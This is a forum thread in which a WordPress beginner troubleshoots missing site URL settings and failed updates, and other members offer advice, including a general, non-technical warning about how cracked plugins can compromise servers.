Wordpress Discussion

Out of context: Reply #162

  • Started
  • Last post
  • 174 Responses
  • cherub0

    I've been putting out wp fires left and right for the past 48 hours + with hardly any sleep. Which normally wouldn't be surprising except one small detail...

    I'm a wordpress newbie. This feels so unfair.

    My new wp site somehow LOST its WP_HOME and WP_SITEURL paths ...how it happened is beyond me but in the wp site health info tab, I see the word "undefined" next to "HOME URL" / "SITE URL" and I'm thinking... WOW... Just WOW. Thanks wordpress!

    This explains why I have been plagued with 'Update failed' error over the last few days when trying to update my site, along with the "undefined is not an object" error. (again while updating)

    I'll just leave this here in case anyone has to deal with this shite.
    https://www.reddit.com/r/Wordpre…

    I added the lines to my wp-config.php file ... fingers crossed.

    cherub 0Permalink
    UpvoteDownvote
    Flag
    • Hacked site? Change all passwordsOBBTKN
    • Either that or my lousy host is using charity shop computers as their 'shared servers' I could see both equally likely...cherub
    • I used this a while ago, when I was into wp stuff. local dev + backup. then upload to server.
      https://localwp.com/…      uan
    • Poke around in the database and see if there are any suspicious entries in the WP_HOME and WP_SITEURL tables. Those look like db names to me.monNom
    • You might be able to manually enter the correct values and make things work again.
      They may have been changed by a plugin. You have to be very careful with them      monNom
    • Because you basically give a plugin admin privileges with wordpress. A plugin can edit the db, and can load additional files from remote servers.monNom
    • You have to trust them 110%.monNom
    • 'you basically give a plugin admin privileges' WAT?? plugins have root? oh wow...cherub
    • "fingers crossed" spoiler alert... the bug came back. (see my post below)cherub
    • Maybe not root right away. One way I've seen is that a cracked plugin will have a php file that when run will create a new user, email them their credentials...monNom
    • cURL additional payloads to the server, etc. Then a bot will spider the web and query sites to see if they have that file... if they do, you get owned.monNom
    • For the cracker, they get a steady flow of new compromised servers every time they run their spider. Then they send spam, steal info, ransomware. It's a farm.monNom
    • Presumably the spider part isn’t even required, you just need to insert the new user code into a commonly accessed file that gets run by the plugin.monNom
    • ^that is scary as fuck. all of it.cherub
    • Probably the best way to learn your way around how Wordpress works is to build a theme yourself from scratch.monNom
    • There are a bunch of YouTube tutorials on exactly that. You’ll understand where the difference between static pages and posts comes from, and where things live.monNom
    • The customize menu is actually a giant security hole, so it’s best to lock it down.
      All your logs are on the Apache server. Php logs, sql logs, etc.      monNom
    • And yes. Wordpress is way overkill for a landing page. Just do a static site. No worry about security, more performant, form handling can be done with embedsmonNom
    Show [[ numHiddenNotes ]] more notesAdd Note
    SaveCancel

View thread